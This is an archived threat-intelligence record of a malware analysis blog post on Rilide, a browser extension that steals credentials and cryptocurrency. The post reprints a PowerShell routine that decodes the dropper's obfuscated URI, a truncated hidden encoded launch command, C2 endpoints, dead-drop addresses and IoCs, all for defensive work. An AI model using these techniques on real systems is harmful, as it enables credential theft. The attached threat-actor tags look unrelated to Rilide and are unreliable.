{
	"id": "ed99cc11-2975-40db-ac72-96948a3da874",
	"created_at": "2026-04-06T00:19:38.64608Z",
	"updated_at": "2026-04-10T13:12:22.536583Z",
	"deleted_at": null,
	"sha1_hash": "3e9238447cfc59691cf3c3c66304f3085ed342fb",
	"title": "Rilide: An Information Stealing Browser Extension",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4845219,
	"plain_text": "Rilide: An Information Stealing Browser Extension\r\nBy Pulsedive Threat Research\r\nPublished: 2025-03-21 · Archived: 2026-04-05 20:02:50 UTC\r\nRilide is an example of an information stealer masquerading as a browser extension. First reported in April 2023, the\r\nmalware targets Chromium-based browsers such as Google Chrome and Microsoft Edge. It is designed to take screenshots\r\nof information, log passwords, and collect credentials for cryptocurrency wallets.\r\nRilide is delivered via malicious advertisements or phishing pages. When users interact with these payloads, a loader installs\r\nthe Rilide extension. Security researchers have observed Rilide impersonating Google Drive and Palo Alto extensions.\r\nAssociated IoCs can be accessed using Pulsedive’s Explore feature.\r\nThis blog outlines:\r\nHow Rilide is delivered\r\nWalkthrough of an intrusion chain that dropped Rilide\r\nMitigation strategies\r\nHow Rilide is Delivered\r\nThreat researchers have identified multiple delivery mechanisms used to drop Rilide, with phishing websites being the most\r\ncommon. Versions from August 2023 were adapted to work with Chrome Extension Manifest V3. These changes include\r\nremoving the ability to execute external logic using executeScript(), eval(), and new Function(). Moreover,\r\nManifest V3 no longer allows developers to load and execute remotely hosted files; as such, all the logic must be part of the\r\nextension package itself.\r\nThe newer Rilide versions were delivered using three different mechanisms.\r\n1. The first campaign uses a PowerPoint lure with a phishing website to fetch the Rilide stealer.\r\n2. The second campaign leverages Twitter as the initial lure. When interacting with the Twitter lure, the user is\r\nredirected to a phishing website that downloads an executable file that sets up the malicious extension using an LNK\r\nfile.\r\n3. Researchers at Trustwave grouped two separate vectors into a third campaign. 
One intrusion chain is similar to the\r\nsecond campaign, with the only exception being the use of Google Ads instead of Twitter. The rest of the intrusion\r\nchain remains the same. The last intrusion chain uses a PowerShell loader to install Rilide. It is unclear how the user\r\nreceives the PowerShell loader.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 1 of 31\n\nFigure 1: Campaigns leading to Rilide. This version of Rilide has been adapted to comply with the Chrome\r\nExtension Manifest V3 requirements. Source: Hacker News\r\nThe sample we analyzed for this blog belongs to campaign 3, which uses a PowerShell loader to install the malicious\r\nextension.\r\nAn Intrusion Dropping Rilide\r\nA PowerShell Dropper\r\nToward the end of November 2024, VMRay shared details about a PowerShell script used to drop a Rilide sample. As of\r\nMarch 15, 2025, VirusTotal indicates that only four vendors flag the script as malicious. The earliest sample in the intrusion\r\nchain starts with the PowerShell script identified by VMRay; however, the exact way the script was delivered to the user is\r\nunknown. Figure 2 shows the complete intrusion chain observed during analysis.\r\nFigure 2: Intrusion chain observed during analysis\r\nFigure 3: VirusTotal results for the PowerShell script as of March 15, 2025. Source: VirusTotal\r\nFile Details\r\nCharacteristic Value\r\nMD5 650052f23efde0ed4460b760134db8c6\r\nSHA-1 286574e458cddb32032ba4935d7f8e2716cfcf2c\r\nSHA-256 76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7\r\nFile Size 2.15 KB\r\nFile Extension ps1\r\nBehavior\r\nFirst Stage\r\nWhen the PowerShell script is run, it launches another PowerShell instance that executes base64 encoded commands\r\nwithout displaying the PowerShell window to the user.\r\nFigure 4: Encoded PowerShell command captured within VMRay. 
Source: VMRay\r\nThe base64 encoded content can be decoded using CyberChef’s From Base64 recipe. The decoded content contains a base64\r\nencoded string, which is manipulated through character replacement and XOR operations before being passed to the PowerShell\r\nfunction DownloadString as the URI.\r\nFigure 5: Decoded PowerShell script contains base64 encoded values that go through a series of character\r\nmanipulations.\r\nThe URI can be decoded by running the code snippet within PowerShell before the script creates a new web client\r\nconnection.\r\n# Stage 1: restore the base64 alphabet, decode, and XOR every byte with 198 (0xC6)\r\n$lUhpJ = (\"kpC3/7WN/qCHo4b2sP@tgrfwv/+UrZ6oqfGIj4egrL7xlJeHt/GWt4OX+/s=\")\r\n$HgwsG = $lUhpJ.Replace(\"@\", \"a\")\r\n$TWJXW = [Convert]::FromBase64String($HgwsG) | ForEach-Object { $_ -bxor 198}\r\n# Stage 2: the result is another base64 string; decode it and XOR with a 5-byte rolling key\r\n$ZLb8q = [System.Text.Encoding]::ASCII.GetString($TWJXW).Replace(\"@\", \"a\")\r\n$RUveK = [Convert]::FromBase64String($ZLb8q)\r\n$QK9tt = [byte[]](37, 46, 201, 192, 220);\r\n$eyMTA = 0;\r\n$CJC2W = $RUveK | ForEach-Object {\r\n$_ -bxor $QK9tt[$eyMTA++];\r\nif ($eyMTA -ge $QK9tt.Length) {\r\n$eyMTA = 0\r\n}\r\n}\r\n# $CJC2W now holds the ASCII byte values of the second stage URI\r\n$CJC2W\r\nPrinting the variable that holds the ASCII values for the URI returns the array shown in Figure 6 below.\r\nFigure 6: ASCII values holding the second stage domain\r\nThe array of ASCII values can be decoded using the PowerShell command $mdKyK = [System.Text.Encoding]::ASCII.GetString($CJC2W); or using CyberChef’s From Decimal recipe.\r\nFigure 7: The ASCII values converted into text to reveal the second stage URI.\r\nWHOIS data for the decoded domain shows that it was registered with NameCheap. Moreover, the domain was registered\r\non October 5, 2024, approximately a month before the post from VMRay.
\r\nFigure 8: WHOIS data within the Pulsedive platform for tcl-black[.]com\r\nThe domain was unreachable as of March 15, 2025, but historical data was stored on URLscan.io. The webpage contained\r\nobfuscated code that the PowerShell script manipulates by replacing certain characters before converting it from base64.\r\nOnce the command is decoded, it is executed using PowerShell.\r\nFigure 9: A historical scan showing the content hosted on the decoded URL. Source: URLscan.io\r\nThe character conversions employed during this stage are:\r\nOriginal Value New Value\r\n! l\r\n* d\r\n`” T\r\n‘ H\r\n; F\r\nFigure 10: Decoded content from tcl-black[.]com reveals additional PowerShell commands\r\nSecond Stage\r\nThe decoded script contains another blob of base64 that goes through a series of manipulations before being executed using\r\nthe iex command. The first manipulation is a series of character replacements that change certain symbols into characters\r\nwithin the base64 character set. The replacements are:\r\nOriginal Value New Value\r\n% d\r\n$ a\r\n! b\r\n@ B\r\nThis data is converted from base64 and XORed with a byte array. Following the XOR operation, the data is decrypted using\r\nAES-256 in Cipher Block Chaining (CBC) mode with PKCS7 padding. The decryption key and initialization vector are stored\r\nas hardcoded, base64 encoded variables.\r\nFigure 11: The decoded PowerShell script pulled from tcl-black[.]com\r\nThird Stage - Setting up Rilide\r\nThe decrypted data is additional PowerShell code that is executed. This code is used to install the Rilide extension. 
The\r\nPowerShell script's primary function is FCZoL, which first attempts to gather the current user's SID.\r\nFigure 12: Decrypted content from the second stage PowerShell script that shows additional PowerShell\r\ncommands.\r\nFigure 13: The script uses PowerShell cmdlets to get the local user\r\nThe script then generates a random string that is 80 characters long and consists of alphanumeric characters. The following\r\nline of the script converts a string of bytes into a UTF-8 encoded string. This string contains a base64 blob containing JSON\r\ndata that appears to be related to the Rilide extension.\r\nFigure 14: Character set returned from a function within PowerShell.\r\nFigure 15: Base64 content reveals content that is later added to the Secure Preferences for managing settings\r\nfor a Chrome Profile.\r\nFigure 16: Extension details added to Secure Preferences.\r\nThe PowerShell script then creates strings that hold paths to web browsers. The browsers targeted, and the paths specified in\r\nthe malware are:\r\nFigure 17: PowerShell code used to create paths to web browser content on disk.\r\nWeb Browser Path\r\nChrome %localappdata%/Google/Chrome/User Data\r\nBrave %localappdata%/BraveSoftware/Brave-Browser/User Data\r\nEdge %localappdata%/Microsoft/Edge/User Data\r\nOpera %appdata%/Opera Software/Opera Stable\r\nThe PowerShell script contains all the content that makes up the Rilide files as hardcoded base64 strings. These strings are\r\nwithin the function aRUC2M. This function takes the previously created character set and the directory name where the\r\nextension will be stored. In this case, the directory name is $MxNC2$JJ0wH, as shown in the figure below.\r\nFigure 18: Path where the Rilide files are saved on disk.\r\nThe script attempts to create the path shown in Figure 18 and then tries to create files within that directory. 
\r\nFigure 19: Code used to create the $MxNC2$JJ0wH directory and drop the Rilide files.\r\nEach file that makes up the Rilide extension and its content is stored as a base64-encoded pair. The first variable is the file\r\nname, and the second is the actual content. The script writes the file for any file name containing the extension *.png. If\r\nthe file name contains the string manifest.json, a set of character replacements occurs before it is written to disk. For all other\r\nfiles, the script just writes the content to a file on disk.\r\nThe last step in the PowerShell script is to add the extension to the different web browsers specified within the script itself.\r\nFigure 20: Function calls to add 
the Rilide extension to the targeted web browsers.\r\nBefore installing the malicious extension, the PowerShell script terminates any running instances of the targeted web browsers\r\nbefore the extension is enabled. The extension is installed only for the user who is logged in when the script is\r\nrunning. It then attempts to modify the Secure Preferences or the Preferences file (for Microsoft Edge) within the Default or\r\nProfile subdirectories. The content shown in Figure 16 is updated to reflect the path shown in Figure 18. Once this\r\nmodification occurs, it is added to the Secure Preferences JSON file. The script also checks if the extension is already installed; if it\r\nis, the content is updated to the API content extracted by the script. Otherwise, it adds the content to the file.\r\nFigure 21: Code used to add the content shown in Figure 16 to files used by the web browsers. This is used to\r\nadd the extension to the web browser.\r\nOnce the extension path is added to the preferences file, the PowerShell script waits 4 seconds before launching the web\r\nbrowser.\r\nFigure 22: The content from Figure 16 is updated to reflect the path to Rilide. The path was previously shown\r\nin Figure 18.\r\nRilide Browser Extension\r\nConsistent with Trustwave's reporting, the malware masquerades as a Google Drive utility that claims to save content to Google Drive.\r\nThe extension's permissions indicate that it can interact with cookies, clipboard data, and system information. Rilide uses\r\ninjected scripts to steal credentials and cryptocurrency and take screenshots.\r\nFigure 23: Functionality present within Rilide. Source: Hacker News\r\nThe extension masquerades as a Google Drive utility that aims to help users save content to Drive. 
This is indicated by the\r\nname and description specified in the manifest.json file and the extension’s icon.\r\nFigure 24: A screenshot showing Rilide installed in Google Chrome.\r\nFigure 25: Details about the Rilide extension within Google Chrome.\r\nFigure 26: The malware uses the Google Drive icon as its icon.\r\nThe main files in the extension are:\r\nconfig.js\r\nmanifest.json\r\nrules.json\r\nico.png\r\nsrc/ToggleTest.js\r\nsrc/content/OpenRemove.js\r\nsrc/content/AlertReceive.js\r\nsrc/content/Release.js\r\nThe extension’s directory contains other JavaScript files with helper functions that expand its functionality. These files are\r\nessential to the three scripts injected into each webpage.\r\nFigure 27: Files within the Rilide directory.\r\nmanifest.json\r\nThe extension’s manifest.json shows that the extension can query system information such as CPU and storage information.\r\nIt can also access the browser’s local storage. Moreover, the extension allows access to the clipboard for reading and writing\r\ncapabilities. The service worker is a file called ToggleTest.js. The extension injects three scripts into every webpage,\r\ncollecting information from the pages. The scripts are:\r\nOpenRemove.js\r\nAlertReceive.js\r\nRelease.js\r\nFigure 28: Content of the manifest.json file\r\nFigure 29: The manifest.json file shows the injected scripts and declarative_net_request specifications.\r\nFor more information about how Browser Extensions work, please read our blog.\r\nThe rules.json is specified as part of the declarative_net_request objects, an API that blocks or modifies web requests. 
In\r\nthis case, the API is used to modify response headers and strip the content security policy.\r\nrules.json\r\nFigure 30: The rules declared within the rules.json that are used to remove content security policies.\r\nThe rules.json file is used to modify headers in network requests and remove any content security policy values set by the\r\nweb pages.\r\nconfig.js\r\nFigure 31: Configuration parameters for Rilide, including the ability to set up a Telegram C2 channel.\r\nThe config file contains references to Telegram and Web-based panels. However, this sample does not appear to have a\r\nTelegram panel, as shown by the lack of details within the TelegramPanel object.\r\nToggleTest.js\r\nToggleTest.js is a heavily obfuscated file that imports functions from other JavaScript files. The file calls functions to collect\r\nsystem information, execute commands, and take screenshots.\r\nFigure 32: Functions imported by the service worker, ToggleTest.js, to expand its functionality.\r\nOpenRemove.js\r\nThis file was heavily obfuscated and used event listeners to collect messages from cryptocurrency exchanges and other\r\nwebsites, such as Facebook and Google Pay. Before grabbing information, the malware checks local storage in the web\r\nbrowser to obtain settings that determine what information Rilide collects.\r\nFigure 33: Code used to create event listeners that look for cryptocurrency details.\r\nAlertReceive.js\r\nThe AlertReceive.js file is used to read and write text from the clipboard.\r\nFigure 34: Code used to interact with the clipboard.\r\nRelease.js\r\nThis file collects content from email applications. The injected code checks whether the web page is Outlook, Yahoo, or\r\nGmail. 
Once the email application has been identified, the script examines the DOM content on the web page to collect\r\ninformation about the emails.\r\nFigure 35: Deobfuscated code from Release.js that looks for Outlook, Yahoo, and Gmail pages.\r\nResearch from Trellix outlines that Rilide looks for messages from cryptocurrency exchanges and modifies their content to\r\ncollect credentials from users when they attempt to log in to the exchange.\r\nFigure 36: Notes from Trellix indicate that Rilide modified emails to lure users into signing into their\r\ncryptocurrency accounts. Source: Trellix\r\nNetwork Traffic\r\nA packet capture of Rilide network traffic and SSL decryption keys are provided as a reference.\r\nC2 Resolution using Dead Drops\r\nRilide queries different blockchain services to obtain the C2 server, which is stored as a base58-encoded value in another\r\ncryptocurrency address. The blockchain services queried include:\r\nBlockstream\r\nBitcoin Explorer\r\nBlockcypher\r\nMempool\r\nBitcore\r\nThe Bitcoin address that the malware looks up is bc1qkljhfktumxjqa52yle0xzz9nd4jl40vzyyc066.\r\nFigure 37: Cryptocurrency transaction to the BitCoin address the malware looks up. Source: Blockchain.com\r\nFigure 38: Requests to blockstream.info that return another BitCoin address that also doubles as the C2\r\naddress for the malware. 
\r\nFigure 38: Requests to Blockcypher showing the second BitCoin address.\r\nThe address is 1Aybhtfb3TM36MDmULVXJVAFni8V8tR4aS and decodes to the C2 server memento-mori[.]com\r\nFigure 39: The second BitCoin address can be decoded into the C2 domain using base58.\r\nC2 Communication\r\nOnce the C2 server has been identified, the extension starts exfiltrating information back to it. The malware returns system\r\ninformation data to the C2 server via a POST request to the URI /api/machine/init.\r\nFigure 40: System information exfiltrated by Rilide.\r\nThe information includes:\r\nCPU details\r\nOperating System information\r\nDisplay information\r\nExtension details\r\nOther commands observed within network traffic include:\r\n/api/machine/injections\r\n/api/machine/commands\r\n/api/machine/settings\r\n/api/machine/clipper\r\n/api/machine/screenshot-rules\r\n/api/machine/set-command\r\nFigure 41: Phases returned by the C2 used to determine what information Rilide targets. This command also\r\nreturns a reverse proxy address if the malware uses one.\r\nMitigations\r\nExtension Management\r\nAvoid installing extensions from untrusted sources or third-party websites.\r\nWhile using Browser Extensions Stores significantly reduces the risk of downloading malicious\r\nextensions, it does not eliminate the risk. 
Our blog, Compromised Browser Extensions - A Growing\r\nThreat Vector, highlights compromised extensions on the Chrome Store.\r\nUsers should review permissions used by extensions before installing them.\r\nUsers should periodically review installed extensions to identify any that are no longer needed and remove\r\nthem.\r\nPowerShell Logging\r\nEnable PowerShell logging features, including:\r\nModule Logging\r\nScript Block Logging\r\nHave PowerShell logs ingested into a SIEM or centralized log management solution for monitoring.\r\nBlock users from running PowerShell commands.\r\nRestrict PowerShell usage to only those who are required to run PowerShell commands.\r\nIndicators of Compromise\r\nThe table below contains all Rilide network IoCs identified during the analysis of the intrusion chain.
\r\ntcl-black[.]com\r\nThe table below contains a subset of additional Rilide network IoCs that have been added to the Pulsedive platform. This\r\ndata can be queried in Pulsedive using the Explore query threat=Rilide and is available for export in multiple formats (CSV,\r\nSTIX 2.1, JSON).\r\nIOCs\r\nashgrrwt[.]click\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 28 of 31\n\nnch-software[.]info\r\nnvidia-graphics[.]top\r\nvceilinichego[.]ru\r\n45[.]15[.]156[.]210\r\nweb-lox[.]com\r\nassets[.]bnbcoinstatic[.]com\r\nproyectopatentadomxapostol[.]com\r\nblackfox[.]lol\r\npupkalazalupka[.]com\r\nextension-login[.]com\r\ntes123123t[.]com\r\nextensionsupdate[.]com\r\nhxxps[:=//]download[.]hdoki[.]org/yzxdhdxsqkmvcayrtevs/RiotRevelry1[.]0[.]2[.]exe\r\nhxxps[:=//]nch-software[.]info/1/2[.]exe\r\nnightpredators[.]com\r\nRilide MITRE ATT\u0026CK TTPs\r\nTechnique Tactic\r\nCollection Clipboard data (T1115)\r\nEmail Collection (T1114)\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 29 of 31\n\nScreen Capture (T1113)\r\nCommand and Control\r\nApplication Layer Protocol: Web Protocols (T1071.001)\r\nDynamic Resolution (T1568)\r\nWeb Service: Dead Drop Resolver (T1102.001)\r\nProxy: External Proxy (T1090.002)\r\nIngress Tool Transfer (T1105)\r\nCredential Access\r\nClipboard data (T1115)\r\nSteal Web Session Cookie (T1539)\r\nDefense Evasion\r\nAccess Token Manipulation (T1134)\r\nDeobfuscate/Decode Files or Information (T1140)\r\nMasquerading (T1036)\r\nObfuscated Files or Information (T1027)\r\nProcess Injection (T1055)\r\nVirtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)\r\nDiscovery\r\nSystem Information Discovery (T1082)\r\nVirtualization/Sandbox Evasion: User Activity Based Checks (T1497.002)\r\nEvasion Masquerading (T1036)\r\nExecution Command and Scripting Interpreter: PowerShell (T1059.001)\r\nCommand and Scripting Interpreter: JavaScript 
(T1059.007)\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 30 of 31\n\nUser Execution: Malicious File (T1204.002)\r\nInitial Access Phishing (T1566)\r\nPersistence\r\nBoot or Logon Autostart Execution (T1547)\r\nBrowser Extensions (T1176)\r\nPrivilege Escalation\r\nAccess Token Manipulation (T1134)\r\nBoot or Logon Autostart Execution (T1547)\r\nProcess Injection: Process Hollowing (T1055.012)\r\nReferences\r\nhttps://developer.chrome.com/docs/extensions/develop/migrate\r\nhttps://thehackernews.com/2023/08/new-version-of-rilide-data-theft.html\r\nhttps://x.com/vmray/status/1862414695002501223\r\nhttps://www.vmray.com/analyses/76afc4a7ef10/report/overview.html\r\nhttps://www.virustotal.com/gui/file/76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7/detection\r\nhttps://urlscan.io/result/08eff9cb-4431-4fc9-b957-0733a5391e5e/\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rilide-a-new-malicious-browser-extension-for-stealing-cryptocurrencies/\r\nhttps://www.trellix.com/en-in/blogs/research/genesis-market-no-longer-feeds-the-evil-cookie-monster/ \r\nhttps://www.exabeam.com/blog/security-operations-center/powershell-and-command-line-logging-with-logrhythm/\r\nAppendix 1 - PowerShell Script\r\n\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -e JABsAFUAaABwAEoAIAA9ACAAKAAiAGsAcABDAD\r\nSource: https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 31 of 31",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/"
	],
	"report_names": [
		"rilide-an-information-stealing-browser-extension"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434778,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e9238447cfc59691cf3c3c66304f3085ed342fb.pdf",
		"text": "https://archive.orkl.eu/3e9238447cfc59691cf3c3c66304f3085ed342fb.txt",
		"img": "https://archive.orkl.eu/3e9238447cfc59691cf3c3c66304f3085ed342fb.jpg"
	}
}